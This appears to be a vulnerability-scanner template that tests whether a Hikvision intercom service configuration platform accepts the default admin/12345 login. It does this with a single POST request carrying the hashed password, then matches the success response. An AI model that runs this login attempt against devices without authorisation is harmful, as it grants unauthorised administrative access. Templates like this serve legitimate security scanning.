id: hikvision-intercom-service-default-password

info:
    name: Hikvision Intercom Service Default Password
    author: xueba(user/pass=admin/12345)
    severity: high
    verified: true
    description: app="HIKVISION-群组对讲服务配置平台" admin/12345

rules:
    r0:
        request:
            method: POST
            path: /authorize.action
            body: |
                username=admin&userpsw=827ccb0eea8a706c4c34a16891f84e7b&language=zh_cn
        expression: response.status == 200 && "\"success\":(.*?)true,(.*?)\"msg\":(.*?)\"OK\"".bmatches(response.body)
expression: r0()

